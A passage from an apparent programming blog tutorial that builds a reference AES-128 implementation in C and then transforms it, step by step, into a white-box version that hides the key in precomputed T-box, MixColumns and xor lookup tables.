    { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B, 0x8C, 0x8D, 0x8E, 0x8F, 0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F, 0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF, 0xC0, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xCA, 0xCB, 0xCC, 0xCD, 0xCE, 0xCF, 0xD0, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xDD, 0xDE, 0xDF, 0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF },
    { 0x00, 0x02, 0x04, 0x06, 0x08, 0x0A, 0x0C, 0x0E, 0x10, 0x12, 0x14, 0x16, 0x18, 0x1A, 0x1C, 0x1E, 0x20, 0x22, 0x24, 0x26, 0x28, 0x2A, 0x2C, 0x2E, 0x30, 0x32, 0x34, 0x36, 0x38, 0x3A, 0x3C, 0x3E, 0x40, 0x42, 0x44, 0x46, 0x48, 0x4A, 0x4C, 0x4E, 0x50, 0x52, 0x54, 0x56, 0x58, 0x5A, 0x5C, 0x5E, 0x60, 0x62, 0x64, 0x66, 0x68, 0x6A, 0x6C, 0x6E, 0x70, 0x72, 0x74, 0x76, 0x78, 0x7A, 0x7C, 0x7E, 0x80, 0x82, 0x84, 0x86, 0x88, 0x8A, 0x8C, 0x8E, 0x90, 0x92, 0x94, 0x96, 0x98, 0x9A, 0x9C, 0x9E, 0xA0, 0xA2, 0xA4, 0xA6, 0xA8, 0xAA, 0xAC, 0xAE, 0xB0, 0xB2, 0xB4, 0xB6, 0xB8, 0xBA, 0xBC, 0xBE, 0xC0, 0xC2, 0xC4, 0xC6, 0xC8, 0xCA, 0xCC, 0xCE, 0xD0, 0xD2, 0xD4, 0xD6, 0xD8, 0xDA, 0xDC, 0xDE, 0xE0, 0xE2, 0xE4, 0xE6, 0xE8, 0xEA, 0xEC, 0xEE, 0xF0, 0xF2, 0xF4, 0xF6, 0xF8, 0xFA, 0xFC, 0xFE, 0x1B, 0x19, 0x1F, 0x1D, 0x13, 0x11, 0x17, 0x15, 0x0B, 0x09, 0x0F, 0x0D, 0x03, 0x01, 0x07, 0x05, 0x3B, 0x39, 0x3F, 0x3D, 0x33, 0x31, 0x37, 0x35, 0x2B, 0x29, 0x2F, 0x2D, 0x23, 0x21, 0x27, 0x25, 0x5B, 0x59, 0x5F, 0x5D, 0x53, 0x51, 0x57, 0x55, 0x4B, 0x49, 0x4F, 0x4D, 0x43, 0x41, 0x47, 0x45, 0x7B, 0x79, 0x7F, 0x7D, 0x73, 0x71, 0x77, 0x75, 0x6B, 0x69, 0x6F, 0x6D, 0x63, 0x61, 0x67, 0x65, 0x9B, 0x99, 0x9F, 0x9D, 0x93, 0x91, 0x97, 0x95, 0x8B, 0x89, 0x8F, 0x8D, 0x83, 0x81, 0x87, 0x85, 0xBB, 0xB9, 0xBF, 0xBD, 0xB3, 0xB1, 0xB7, 0xB5, 0xAB, 0xA9, 0xAF, 0xAD, 0xA3, 0xA1, 0xA7, 0xA5, 0xDB, 0xD9, 0xDF, 0xDD, 0xD3, 0xD1, 0xD7, 0xD5, 0xCB, 0xC9, 0xCF, 0xCD, 0xC3, 0xC1, 0xC7, 0xC5, 0xFB, 0xF9, 0xFF, 0xFD, 0xF3, 0xF1, 0xF7, 0xF5, 0xEB, 0xE9, 0xEF, 0xED, 0xE3, 0xE1, 0xE7, 0xE5 },
    { 0x00, 0x03, 0x06, 0x05, 0x0C, 0x0F, 0x0A, 0x09, 0x18, 0x1B, 0x1E, 0x1D, 0x14, 0x17, 0x12, 0x11, 0x30, 0x33, 0x36, 0x35, 0x3C, 0x3F, 0x3A, 0x39, 0x28, 0x2B, 0x2E, 0x2D, 0x24, 0x27, 0x22, 0x21, 0x60, 0x63, 0x66, 0x65, 0x6C, 0x6F, 0x6A, 0x69, 0x78, 0x7B, 0x7E, 0x7D, 0x74, 0x77, 0x72, 0x71, 0x50, 0x53, 0x56, 0x55, 0x5C, 0x5F, 0x5A, 0x59, 0x48, 0x4B, 0x4E, 0x4D, 0x44, 0x47, 0x42, 0x41, 0xC0, 0xC3, 0xC6, 0xC5, 0xCC, 0xCF, 0xCA, 0xC9, 0xD8, 0xDB, 0xDE, 0xDD, 0xD4, 0xD7, 0xD2, 0xD1, 0xF0, 0xF3, 0xF6, 0xF5, 0xFC, 0xFF, 0xFA, 0xF9, 0xE8, 0xEB, 0xEE, 0xED, 0xE4, 0xE7, 0xE2, 0xE1, 0xA0, 0xA3, 0xA6, 0xA5, 0xAC, 0xAF, 0xAA, 0xA9, 0xB8, 0xBB, 0xBE, 0xBD, 0xB4, 0xB7, 0xB2, 0xB1, 0x90, 0x93, 0x96, 0x95, 0x9C, 0x9F, 0x9A, 0x99, 0x88, 0x8B, 0x8E, 0x8D, 0x84, 0x87, 0x82, 0x81, 0x9B, 0x98, 0x9D, 0x9E, 0x97, 0x94, 0x91, 0x92, 0x83, 0x80, 0x85, 0x86, 0x8F, 0x8C, 0x89, 0x8A, 0xAB, 0xA8, 0xAD, 0xAE, 0xA7, 0xA4, 0xA1, 0xA2, 0xB3, 0xB0, 0xB5, 0xB6, 0xBF, 0xBC, 0xB9, 0xBA, 0xFB, 0xF8, 0xFD, 0xFE, 0xF7, 0xF4, 0xF1, 0xF2, 0xE3, 0xE0, 0xE5, 0xE6, 0xEF, 0xEC, 0xE9, 0xEA, 0xCB, 0xC8, 0xCD, 0xCE, 0xC7, 0xC4, 0xC1, 0xC2, 0xD3, 0xD0, 0xD5, 0xD6, 0xDF, 0xDC, 0xD9, 0xDA, 0x5B, 0x58, 0x5D, 0x5E, 0x57, 0x54, 0x51, 0x52, 0x43, 0x40, 0x45, 0x46, 0x4F, 0x4C, 0x49, 0x4A, 0x6B, 0x68, 0x6D, 0x6E, 0x67, 0x64, 0x61, 0x62, 0x73, 0x70, 0x75, 0x76, 0x7F, 0x7C, 0x79, 0x7A, 0x3B, 0x38, 0x3D, 0x3E, 0x37, 0x34, 0x31, 0x32, 0x23, 0x20, 0x25, 0x26, 0x2F, 0x2C, 0x29, 0x2A, 0x0B, 0x08, 0x0D, 0x0E, 0x07, 0x04, 0x01, 0x02, 0x13, 0x10, 0x15, 0x16, 0x1F, 0x1C, 0x19, 0x1A }
};

Once you have this magic table, the multiplication gets really easy. Let's take an example:

[figure mixcolumn_example.png: a state column (d4, bf, 5d, 30) multiplied against the fixed 4x4 MixColumns matrix]
As I said, the four bytes at the left are from your state & the 4x4 matrix is the fixed one (filled with only 3 different values). To get the first byte of the result of this multiplication you just have to execute this:
reduce(operator.xor, [gmul[1][0xd4], gmul[2][0xbf], gmul[0][0x5d], gmul[0][0x30]])

The first indexes into the table are the actual values taken from the 4x4 matrix, minus one (because our array is addressed from index 0). So you can declare your own 4x4 matrix with proper indexes & do the multiplication four times:

void MixColumns(unsigned char out[16])
{
    const unsigned char matrix[16] = {
        1, 2, 0, 0,
        0, 1, 2, 0,
        0, 0, 1, 2,
        2, 0, 0, 1
    };

    /// (the global `gmul` table defined above is reused here; the full mixed
    /// column for (d4, bf, 5d, 30) is (04, 66, 81, e5), as in the FIPS-197 example)
    /// In[19]: reduce(operator.xor, [gmul[1][0xd4], gmul[2][0xbf], gmul[0][0x5d], gmul[0][0x30]])
    /// Out[19]: 4
    /// In[20]: reduce(operator.xor, [gmul[0][0xd4], gmul[1][0xbf], gmul[2][0x5d], gmul[0][0x30]])
    /// Out[20]: 102

    for (size_t i = 0; i < 4; ++i)
    {
        unsigned char a = out[i * 4 + 0];
        unsigned char b = out[i * 4 + 1];
        unsigned char c = out[i * 4 + 2];
        unsigned char d = out[i * 4 + 3];

        out[i * 4 + 0] = gmul[matrix[0]][a] ^ gmul[matrix[1]][b] ^ gmul[matrix[2]][c] ^ gmul[matrix[3]][d];
        out[i * 4 + 1] = gmul[matrix[4]][a] ^ gmul[matrix[5]][b] ^ gmul[matrix[6]][c] ^ gmul[matrix[7]][d];
        out[i * 4 + 2] = gmul[matrix[8]][a] ^ gmul[matrix[9]][b] ^ gmul[matrix[10]][c] ^ gmul[matrix[11]][d];
        out[i * 4 + 3] = gmul[matrix[12]][a] ^ gmul[matrix[13]][b] ^ gmul[matrix[14]][c] ^ gmul[matrix[15]][d];
    }
}

Combine them together

Now that we have everything we need, it is going to be easy peasy; really:

  1. The initial state is populated with the plain-text block
  2. Generate the round-keys thanks to the key schedule ; remember 11 keys, the first one being the plain encryption key
  3. The first different round is a simple AddRoundKey operation
  4. Then we enter in the main loop which does 9 rounds:
    1. SubBytes
    2. ShiftRows
    3. MixColumns
    4. AddRoundKey
  5. Last round which is also a bit different:
    1. SubBytes
    2. ShiftRows
    3. AddRoundKey
  6. The state is now your encrypted block, yay!

Here we are, we finally have our AES128 encryption function that we will use as a reference:

void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
    unsigned int d;
    unsigned char round_keys[11][16] = { 0 };
    const unsigned char rcon[] = { 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D };

    /// Key schedule -- Generate one subkey for each round
    /// http://www.formaestudio.com/rijndaelinspector/archivos/Rijndael_Animation_v4_eng.swf

    // First round-key is the actual key
    memcpy(&round_keys[0][0], key, 16);
    d = DW(&round_keys[0][12]);
    for (size_t i = 1; i < 11; ++i)
    {
        // Rotate `d` 8 bits to the right
        d = ROT(d);

        // Takes every bytes of `d` & substitute them using `S_box`
        unsigned char a1, a2, a3, a4;
        // Do not forget to xor this byte with `rcon[i]`
        a1 = S_box[(d >> 0) & 0xff] ^ rcon[i]; // a1 is the LSB
        a2 = S_box[(d >> 8) & 0xff];
        a3 = S_box[(d >> 16) & 0xff];
        a4 = S_box[(d >> 24) & 0xff];

        d = (a1 << 0) | (a2 << 8) | (a3 << 16) | (a4 << 24);

        // Now we can generate the current roundkey using the previous one
        for (size_t j = 0; j < 4; j++)
        {
            d ^= DW(&(round_keys[i - 1][j * 4]));
            *(unsigned int*)(&(round_keys[i][j * 4])) = d;
        }
    }

    /// Dig in now
    /// The initial round is just AddRoundKey with the first one (being the encryption key)
    memcpy(out, in, 16);
    AddRoundKey(round_keys[0], out);

    /// Let's start the encryption process now
    for (size_t i = 1; i < 10; ++i)
    {
        SubBytes(out);
        ShiftRows(out);
        MixColumns(out);
        AddRoundKey(round_keys[i], out);
    }

    /// Last round which is a bit different
    SubBytes(out);
    ShiftRows(out);
    AddRoundKey(round_keys[10], out);
}

Not that bad, right? And we can even prepare a function that tests whether the encrypted block is valid (this is really going to be useful as soon as we start tweaking the implementation):

unsigned char tests()
{
    /// AES128ENC
    {
        unsigned char key[16] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c };
        unsigned char out[16] = { 0 };
        unsigned char plain[16] = { 0x32, 0x43, 0xf6, 0xa8, 0x88, 0x5a, 0x30, 0x8d, 0x31, 0x31, 0x98, 0xa2, 0xe0, 0x37, 0x07, 0x34 };
        unsigned char expected[16] = { 0x39, 0x25, 0x84, 0x1d, 0x02, 0xdc, 0x09, 0xfb, 0xdc, 0x11, 0x85, 0x97, 0x19, 0x6a, 0x0b, 0x32 };
        printf("> aes128_enc_base ..");
        aes128_enc_base(plain, out, key);
        if (memcmp(out, expected, 16) != 0)
        {
            printf("FAIL\n");
            return 0;
        }
        printf("OK\n");
    }

    return 1;
}

Brilliant.

White-boxing AES128 in ~7 steps

Introduction

I'm no crypto-expert whatsoever but I'll still try to explain what "white-boxing" AES means for us. Currently, we have a block encryption primitive with the following signature: void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16]). One purpose of the white-boxing process is to "remove", or I should rather say "hide", the key. Your primitive will work without any input key parameter, but the key won't be hard-coded in the body of the function either. You'll be able to encrypt things without any apparent key.

A perfectly secure but impractical version of a white-box AES would be a big hash-table: the keys would be every single possible plain-text and the values their encrypted versions under the key you want. That should give you a really clear idea of what a white-box is. But obviously storing that kind of table in memory is another problem by itself: 2^128 entries of 16 bytes each is in the order of 10^39 bytes :-).

Instead of using that "naive" idea, researchers came up with ways to pre-compute "things" that involve the round-keys in order to hide everything. The other goal of a real white-box is to be resistant to reverse-engineering & dynamic/static analysis: even if you are able to read whatever memory you want, you still should not be able to extract the key. The NoSuchCon2013 crackme is again a really good example of that: we had to wait 2 years before @doegox actually worked his magic to extract the key.

The design of the implementation is really, really important in order to make that key extraction process as difficult as possible.

In this part, we are using James A. Muir's paper to rewrite our implementation step by step, in order to make it possible to combine several operations together & turn them into pre-computed tables. At the end of this part we should have a working AES128 encryption primitive that doesn't require a hard-coded key. But we will also build in parallel a tool used to generate the different tables our implementation is going to need: obviously, this tool needs both the key schedule & the encryption key to be able to generate the look-up tables. Long story short: the first steps basically reorder / rewrite the logic of the encryption, & the last ones really transform the implementation into a white-box.

Anyway, let's go folks!

Step 1: bring the first AddRoundKey into the loop & kick the last one out of it

This one is really easy: basically we just have to change our loop to run from i=0 to i=8 (inclusive), move the first AddRoundKey into the loop, and move the last one outside of it.

The encryption loop should look like this now:

void aes128_enc_reorg_step1(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    memcpy(out, in, 16);

    for (size_t i = 0; i < 9; ++i)
    {
        AddRoundKey(round_keys[i], out);
        SubBytes(out);
        ShiftRows(out);
        MixColumns(out);
    }

    AddRoundKey(round_keys[9], out);
    SubBytes(out);
    ShiftRows(out);
    AddRoundKey(round_keys[10], out);
}

Step 2: SubBytes then ShiftRows equals ShiftRows then SubBytes

Yet another easy one: because SubBytes replaces each byte by its substitution (stored in S_box) independently of the byte's position, while ShiftRows only permutes positions, the two operations commute; you can apply ShiftRows before SubBytes or SubBytes before ShiftRows & you will get the same result. So let's exchange them:

void aes128_enc_reorg_step2(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        AddRoundKey(round_keys[i], out);
        ShiftRows(out);
        SubBytes(out);
        MixColumns(out);
    }

    /// Last round which is a bit different
    AddRoundKey(round_keys[9], out);
    ShiftRows(out);
    SubBytes(out);
    AddRoundKey(round_keys[10], out);
}

Step 3: ShiftRows first, but you need to ShiftRows the round-key too

This one is a bit more tricky, but again it's more about reordering & rewriting the encryption loop than really replacing computation by look-up tables so far. Basically, the idea of this step is to start the encryption loop with a ShiftRows operation. Because ShiftRows is a plain byte permutation, it distributes over the xor done by AddRoundKey: ShiftRows(state ^ rk) equals ShiftRows(state) ^ ShiftRows(rk). So if you put ShiftRows first, you also need to apply ShiftRows to the current round-key in order to get the same result as AddRoundKey followed by ShiftRows.
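A throwaway check of that identity, reusing the ShiftRows & AddRoundKey helpers from earlier (a sketch, not part of the implementation):

#include <assert.h>
#include <string.h>

void check_shiftrows_distributes_over_xor(unsigned char state[16], unsigned char rk[16])
{
    unsigned char lhs[16], rhs[16], rk2[16];

    // lhs = ShiftRows(state ^ rk)
    memcpy(lhs, state, 16);
    AddRoundKey(rk, lhs);
    ShiftRows(lhs);

    // rhs = ShiftRows(state) ^ ShiftRows(rk)
    memcpy(rhs, state, 16);
    ShiftRows(rhs);
    memcpy(rk2, rk, 16);
    ShiftRows(rk2);
    AddRoundKey(rk2, rhs);

    assert(memcmp(lhs, rhs, 16) == 0);
}

With that settled, here is the reordered version: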

void aes128_enc_reorg_step3(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);
        ShiftRows(round_keys[i]);
        AddRoundKey(round_keys[i], out);
        SubBytes(out);
        MixColumns(out);
    }

    /// Last round which is a bit different
    ShiftRows(out);
    ShiftRows(round_keys[9]);
    AddRoundKey(round_keys[9], out);
    SubBytes(out);
    AddRoundKey(round_keys[10], out);
}

Step 4: White-boxing it like it's hot, White-boxing it like it's hot

This step is a really important one for us: it's actually the first one where we are going to be able to both remove the key & start the tables-generator project. The tables generator basically produces everything we need to have our white-box AES encryption working.

Now we don't need the key schedule anymore in the AES encryption function (we obviously still need it on the table-generator side), and we can keep only the encryption loop.

The transformation introduced in this step is to create a look-up table that replaces the ShiftRows(round_keys[i])/AddRoundKey/SubBytes sequence. We can clearly see now how our round keys are going to be "diffused" & combined with different operations to make them "not trivially" extractable (in fact they are, but let's pretend they are not right now). In order to have such a table, we need quite some space though: basically we need this table: Tboxes[10][16][0x100]. We have 10 ShiftRows(round_keys[i])/AddRoundKey/SubBytes operations, 16 bytes of round key in each one of them, and the 0x100 is for every byte value ([0x00-0xFF]) that can be encrypted.

The computation is not really hard:

  1. We compute the key schedule for a specific encryption key
  2. We populate the table this way:
    1. For each round key:
    2. For every byte possible:
      1. You compute S_box[byte ^ ShiftRows(roundkey)[i]]

The S_box part is for the SubBytes operation, the xor with one byte of the round key is for AddRoundKey & the rest is for ShiftRows(round_keys[i]). There is a special case for the 9th round key, where you also have to fold in the AddRoundKey of the last round key. It's as if we no longer have 11 round-keys but 10, as the 9th T-box layer contains information about both the 9th & 10th round keys.

If you are confused about that bit, don't be; it's just that I suck at explaining things. Just have a look at the following code (especially at the r == 9 special case):

int main()
{
    unsigned char key[16] = "0vercl0k@doare-e";
    unsigned char plain_block[16] = "whatdup folks???";
    unsigned char round_keys[11][16] = { 0 };

    /// 10 -> we have 10 rounds
    /// 16 -> we have 16 bytes of round keys
    /// 0x100 -> we have to be able to encrypt every plain-text input byte [0-0xff]
    unsigned char Tboxes[10][16][0x100] = { 0 };

    key_schedule(key, round_keys);

    /// Remember we have 10 rounds & we want to combine AddRoundKey & SubBytes
    /// which is really simple.
    /// These so-called T-boxes are defined as follows:
    /// Tri(x) = S[x ^ ShiftRows(rk)[i]] ; r being the round number ([0-8]), x being the byte of plaintext, rk the roundkey & i the index ([0-15])
    printf("#pragma once\n");
    printf("// Table for key='%.16s'\n", key);
    printf("const unsigned char Tboxes[10][16][0x100] = \n{\n");
    for (size_t r = 0; r < 10; ++r)
    {
        printf("  {\n");

        ShiftRows(round_keys[r]);

        for (size_t i = 0; i < 16; ++i)
        {
            printf("    {\n      ");
            for (size_t x = 0; x < 0x100; ++x)
            {
                if (x != 0 && (x % 16) == 0)
                    printf("\n      ");

                Tboxes[r][i][x] = S_box[x ^ round_keys[r][i]];
                /// We need to include the bytes from the roundkey 10 to replace that:
                ///  ShiftRows(out);
                ///  ShiftRows(round_keys[9]);
                ///  AddRoundKey(round_keys[9], out);
                ///  SubBytes(out);
                ///  AddRoundKey(round_keys[10], out);
                ///
                /// By
                /// ShiftRows(out);
                /// for (size_t j = 0; j < 16; ++j)
                ///     out[j] = Tboxes[9][j][out[j]];
                if (r == 9)
                    Tboxes[r][i][x] ^= round_keys[10][i];

                printf("0x%.2x", Tboxes[r][i][x]);
                if ((x + 1) < 0x100)
                    printf(", ");
            }
            printf("\n    }");
            if ((i + 1) < 16)
                printf(",");

            printf("\n");
        }
        printf("  }");
        if ((r + 1) < 10)
            printf(",");
        printf("\n");
    }
    printf("};\n\n");
}

Now that we have this table created, we just need to actually use it in our encryption. Thanks to this table, the encryption loop is way simpler and prettier, check it out:

void aes128_enc_wb_step1(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 16; ++j)
        {
            unsigned char x = Tboxes[i][j][out[j]];
            out[j] = x;
        }

        MixColumns(out);
    }

    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

Step 5: Transforming MixColumns into a look-up table

OK, so this is maybe the "most difficult" part of the game: we have to transform our ugly MixColumns function into four look-up tables. Basically, we want to transform this:

out[i * 4 + 0] = gmul[matrix[0]][a] ^ gmul[matrix[1]][b] ^ gmul[matrix[2]][c] ^ gmul[matrix[3]][d];
out[i * 4 + 1] = gmul[matrix[4]][a] ^ gmul[matrix[5]][b] ^ gmul[matrix[6]][c] ^ gmul[matrix[7]][d];
out[i * 4 + 2] = gmul[matrix[8]][a] ^ gmul[matrix[9]][b] ^ gmul[matrix[10]][c] ^ gmul[matrix[11]][d];
out[i * 4 + 3] = gmul[matrix[12]][a] ^ gmul[matrix[13]][b] ^ gmul[matrix[14]][c] ^ gmul[matrix[15]][d];

by this (where Ty[0-3] are the look-up tables I mentioned just above):

DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];

We know that gmul[X][a] gives you 1 byte, and we can see those four lines use gmul[X][a] where X is constant. You can also see that, basically, those four lines take 4 bytes as input (a, b, c & d) and generate 4 bytes as output.

The idea is to combine gmul[matrix[0]][a], gmul[matrix[4]][a], gmul[matrix[8]][a] & gmul[matrix[12]][a] inside a single double-word. We do the same for b, c & d so that we can directly apply the xor operation between double-words; the result is also a double-word, so we have our 4 output bytes. We just re-factorized four individual computations (1 byte as input, 1 byte as output) into a single one (4 bytes as input, 4 bytes as output).

With that in mind, the table-generation function nearly writes itself:

int main()
{
[...]
    typedef union
    {
        unsigned char b[4];
        unsigned int i;
    } magic_int;

    /// 4 -> four rows MC
    /// 0x100 -> for every char
    unsigned int Ty[4][0x100] = { 0 };
    printf("const unsigned int Ty[4][16][0x100] =\n{\n");
    for (size_t i = 0; i < 4; ++i)
    {
        printf("  {\n    ");
        for (size_t j = 0; j < 0x100; ++j)
        {
            if (j != 0 && (j % 16) == 0)
                printf("\n    ");

            magic_int mi;

            mi.b[0] = gmul[matrix[i + 0]][j];
            mi.b[1] = gmul[matrix[i + 4]][j];
            mi.b[2] = gmul[matrix[i + 8]][j];
            mi.b[3] = gmul[matrix[i + 12]][j];

            Ty[i][j] = mi.i;

            printf("0x%.8x", Ty[i][j]);
            if ((j + 1) < 0x100)
                printf(", ");
        }

        printf("\n  }");
        if ((i + 1) < 4)
            printf(",");
        printf("\n");
    }
    printf("};\n");
}

Glad to replace that MixColumns call now:

void aes128_enc_wb_step2(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 16; ++j)
        {
            unsigned char x = Tboxes[i][j][out[j]];
            out[j] = x;
        }

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

You can even make it cleaner by merging the two inner-loops & making both of them handle the state 4 bytes at a time:

// Unified the loops by treating the state 4 bytes by 4 bytes
void aes128_enc_wb_step3(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            a = out[j * 4 + 0] = Tboxes[i][j * 4 + 0][a];
            b = out[j * 4 + 1] = Tboxes[i][j * 4 + 1][b];
            c = out[j * 4 + 2] = Tboxes[i][j * 4 + 2][c];
            d = out[j * 4 + 3] = Tboxes[i][j * 4 + 3][d];

            DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

Step 6: Adding a little xor table

This step is a really simple one (& kind of useless on its own); we just want to replace the xor operation between 2 double-words with a look-up table that xors 2 nibbles (4 bits). Basically, you combine 8 nibble look-ups into a full double-word with or operations & some binary shifts. Easy peasy:

int main()
{
[...]
    /// Xor Tables
    /// Basically takes two nibbles in input & generate a nibble in output (x^y)
    unsigned char Txor[0x10][0x10] = { 0 };
    printf("const unsigned char Txor[0x10][0x10] =\n{\n");
    for (size_t i = 0; i < 0x10; ++i)
    {
        printf("  {\n    ");

        for (size_t j = 0; j < 0x10; ++j)
        {
